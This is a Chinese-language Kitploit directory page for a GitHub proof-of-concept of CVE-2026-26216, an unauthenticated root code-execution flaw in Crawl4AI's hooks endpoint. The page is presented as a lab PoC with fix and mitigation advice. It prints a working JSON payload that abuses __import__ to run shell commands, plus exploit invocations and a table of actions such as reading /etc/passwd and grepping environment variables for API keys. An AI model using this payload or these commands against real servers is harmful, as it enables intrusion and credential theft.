Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
EXPLOIT-CVE-2026-26216 | Kitploit
工具/GitHubGitHub/joaovicdev/exploit-cve-2026-26216
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发实验室与实践
GitHubjoaovicdev/exploit-cve-2026-26216

EXPLOIT-CVE-2026-26216

查看仓库
25天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-26216 — 通过 hooks 实现 Crawl4AI 未认证 RCE(GHSA-5882-5rx9-xgxp)

CVSS 10.0 · 未认证 RCE · CWE-94(代码注入) 在 Crawl4AI(< 0.8.0)的 Docker 服务器上无需认证即可远程执行代码, 滥用 POST /crawl 端点的 hooks 参数。POST 中的单个 JSON 即可在容器内 以 root 身份执行 Python。

这是一个实验室 PoC,自包含且可复现,用于安全研究和教育目的。


一句话概括漏洞

POST /crawl 端点接受 hooks.code.<evento> 字段中的任意 Python 代码。该代码在一个“自制沙箱”——一个受限的 builtins 字典——中通过 exec() 执行。只不过 __import__ 被留在了允许列表(allowlist)中,从而可以调用 __import__('os').system(...),彻底击溃整个沙箱。

root@kitploit:~
POST /crawl
{
  "urls": ["https://example.com"],
  "hooks": {
    "code": {
      "on_page_context_created":
        "async def hook(page, context, **kwargs):\n    __import__('os').system('id')\n    return page"
    }
  }
}

由于官方部署默认关闭 JWT,且容器以 root 身份运行,结果就是未认证的 root RCE。

为什么这是关于“AI 工具中的自制沙箱”的完美一课

这个沙箱看起来是有效的:open、eval、exec 均已被移除,因此一个天真的攻击(open('/etc/passwd'))会被阻止。这制造了虚假的安全感。但只需一个被遗忘的危险 builtin(__import__),就能导入整个标准库(os、subprocess、socket),allowlist 就此沦为摆设。Builtins 允许列表并不是沙箱。


项目结构

root@kitploit:~
CVE-2026-26216/
├── README.md
├── docker-compose.yml         # sobe o servidor vulnerável
├── vulnerable-app/
│   ├── Dockerfile             # imagem que roda como root (igual à oficial)
│   ├── requirements.txt
│   ├── server.py              # FastAPI: POST /crawl sem auth
│   └── hook_manager.py        # o sandbox fraco (a linha vulnerável está aqui)
└── exploit/
    └── exploit.py             # exploit Python (só stdlib)

保真度说明。 vulnerable-app/ 是对 Crawl4AI 漏洞代码路径的精简复刻(不启动 Chromium/Playwright),使 PoC 轻量且 100% 可复现。沙箱行为和 payload 结构均参照官方公告 GHSA-5882-5rx9-xgxp。漏洞代码行已标注在 vulnerable-app/hook_manager.py 中。


如何运行

root@kitploit:~
# 1. sobe o alvo
docker compose up -d --build

# 2. demonstração completa
python3 exploit/exploit.py --target http://localhost:11235 --demo

# 3. comando arbitrário
python3 exploit/exploit.py --target http://localhost:11235 --cmd "id; hostname; env"

# 4. derruba
docker compose down -v

该 exploit 演示了什么

自此之后:内网横向移动、窃取云凭证、持久化等。


影响

  • 机密性: 窃取 OPENAI_API_KEY、内部令牌、容器 secrets。
  • 完整性: 写入/修改文件、植入后门。
  • 可用性: 终止进程、擦除数据。
  • 横向移动: 容器通常可访问内部网络 → 内网渗透。

而这一切都无需认证。


修复方案

已在 Crawl4AI 0.8.0 中修复:

  • __import__(以及 eval/exec/open)已从允许的 builtins 中移除。
  • Hooks 默认禁用 — 通过以下方式显式启用(opt-in): CRAWL4AI_HOOKS_ENABLED=true

通用缓解措施:

  • 升级到 crawl4ai >= 0.8.0。
  • 切勿将 Crawl4AI 服务器直接暴露到互联网;请启用 JWT。
  • 不要以 root 身份运行容器;请使用非特权用户和只读文件系统(read-only FS)。
  • 把“builtins 允许列表”当作它本来的样子:它不是沙箱。要执行不受信任的代码,请使用真正的隔离机制(gVisor、microVM、无网络/文件系统的独立进程、seccomp)。

参考资料

  • GitHub 安全公告 — GHSA-5882-5rx9-xgxp
  • GitHub 安全公告数据库
  • Corgea — CVE-2026-26216
  • GitLab 安全公告数据库
  • miggo.io — GHSA-5882-5rx9-xgxp

法律声明

本材料用于经授权的安全研究和教育。请仅在您拥有或已获得书面明确测试许可的系统上使用。

下载工具
#操作影响
1直接 open('/etc/passwd')被沙箱阻止(虚假的安全感)
2__import__('subprocess') + id/whoami以 root 身份 RCE
3通过 shell 执行 cat /etc/passwd任意文件读取
4env | grep KEY窃取 API 密钥 / 令牌
5echo ... > /tmp/PWNED任意文件写入